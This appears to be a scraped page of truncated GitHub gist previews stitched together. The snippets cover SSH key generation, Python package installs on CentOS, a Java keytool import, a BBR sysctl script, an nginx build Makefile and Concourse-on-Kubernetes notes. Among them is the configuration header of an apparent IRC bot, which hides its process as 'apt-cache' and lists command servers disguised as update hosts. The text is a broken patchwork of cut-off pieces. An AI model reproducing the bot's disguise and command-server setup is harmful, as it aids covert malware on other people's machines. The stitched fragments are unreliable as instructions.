create different ssh key according the article Mac Set-Up Git
$ ssh-keygen -t rsa -C "your_email@youremail.com"
create different ssh key according the article Mac Set-Up Git
$ ssh-keygen -t rsa -C "your_email@youremail.com"
| #define STARTUP 1 | |
| #undef IDENT // Only enable this if you absolutely have to | |
| #define FAKENAME "apt-cache" // What you want this to hide as | |
| #define CHAN "#mint" // Channel to join | |
| #define KEY "bleh" // The key of the channel | |
| int numservers=5; // Must change this to equal number of servers down there | |
| char *servers[] = { | |
| "updates.absentvodka.com", | |
| "updates.mintylinux.com", | |
| "eggstrawdinarry.mylittlerepo.com", |
| package main | |
| import ( | |
| "context" | |
| "encoding/json" | |
| "fmt" | |
| "io/ioutil" | |
| "os" | |
| "os/user" | |
| "path" |
| ### install pip on CentOS 7.x | |
| yum install -y python-pip | |
| yum install -y python-devel libssl-devel libxml2 libxml2-devel libxslt libxslt-devel openssl openssl-devel libffi libffi-devel | |
| CFLAGS="-O0" pip install lxml | |
| pip install scrapy |
keytool -import -alias ${alias} -keystore ${JAVA_HOME}/jre/lib/security/cacerts -file ${path-to-certificate-file}PS: 如果 keytool 要求你输入密码,该值默认为英文
changeit。
| #!/bin/bash | |
| set -eu | |
| SYSCTL_FILE=/etc/sysctl.d/90-tcp-bbr.conf | |
| # check root | |
| if [[ $EUID -ne 0 ]]; then | |
| echo "This script must be run as root" | |
| exit 1 | |
| fi |
| # Author: Eric Pruitt (http://www.codevat.com) | |
| # License: 2-Clause BSD (http://opensource.org/licenses/BSD-2-Clause) | |
| # Description: This Makefile is designed to create a statically linked nginx | |
| # binary without any dependencies on the host system's version of glibc. | |
| NGINX_VERSION=1.15.0 | |
| OPENSSL_VERSION=1.0.2o | |
| PCRE_VERSION=8.42 | |
| ZLIB_VERSION=1.2.11 |
This is a work in progress and gets you to a running state (meaning you can bring the UI up via brower and login). It is not however fully tested.
To generate your keys, see https://concourse.ci/docker-repository.html and https://concourse.ci/binaries.html for notes on getting started.
Also see https://github.com/kubernetes/minikube/releases/tag/v0.12.1 for notes regarding minikube.
In this example, minikube was run on OSX sierra with v0.12.1 and xhyve hypervisor.
This document outlines Brandwatch's Concourse installation running on Kubernetes. The full configuration can be found at https://github.com/BrandwatchLtd/concourse-ops (internal only currently). It's a fairly new installation (1-2 weeks) and we're slowly migrating work from our existing BOSH installation to this.
Comments/questions welcome below.